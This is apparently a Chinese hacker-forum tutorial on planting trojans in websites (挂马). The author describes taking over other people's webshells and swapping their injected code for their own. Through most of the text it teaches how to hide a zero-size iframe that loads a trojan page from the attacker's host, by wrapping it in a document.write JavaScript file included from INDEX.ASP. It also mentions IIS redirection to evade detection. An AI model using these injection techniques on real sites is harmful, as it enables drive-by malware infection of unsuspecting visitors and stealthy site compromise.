今天没事找了些WEBSHELL发现有很多都以给别人先占了坐打开INDEX.ASP发现<iframe src=http://XXXXXX/jiaozhu.htm width=0 height=0></iframe>，早被人挂了马儿,不过把他的代马删掉换上我的就可以了,相信大多数人挂马都会用<iframe src=http://XXXXXX/jiaozhu.htm width=0 height=0></iframe>，这样的代码, 不过这样是很容易就被人发现了, 今天我教你一招隐蔽的对初学者是很有用哦注意看下面代码:

首先在自己的电脑建个文本文档TXT写入document.write("<iframe <iframe src=http://你的木马路经/tzd.htm width=0 height=0></iframe>");然后将文件另存为一个JS的扩展名这样你的JS文件就生成了然后将你的JS文件上传到空间后那你在INDEX.ASP挂马的代码就可以这用写<script language=javascript src=你的.js></script>或在不一个目录下<script language=javascript src=http://xxxxxxxxx/1.js></script>加在主页代码多的地方是不是看不出什么哦,下面我给大家举个例子,我把我的JS取名问1.JS将他上传到wwww.123.com主页目录下然后我在主页的INDEX.ASP中加入代码为<script language=javascript src=1.js></script>这样就可以了
我就不做动画教程了大家按我说明一步一步做就可以了只是利用了javascript的JS脚本呵呵

服务器挂马
这里简单说一个比较狠的吧.重定向任何调用的htm，js,等文件，只要是执行的如图:

这种方法在计算中用搜索关键词是搜索不到的，反正本地怎么找也找不到。。谁能想到是在iis里设置的呢？而且调用文件那么多，怎么知道是重定向的那个文件呢？反正现在想不到有什么好方法可以解决，如果服务器如上图被挂马了，偶最好的建议是重装IIS 
挂马很多种多动脑筋让马儿更隐藏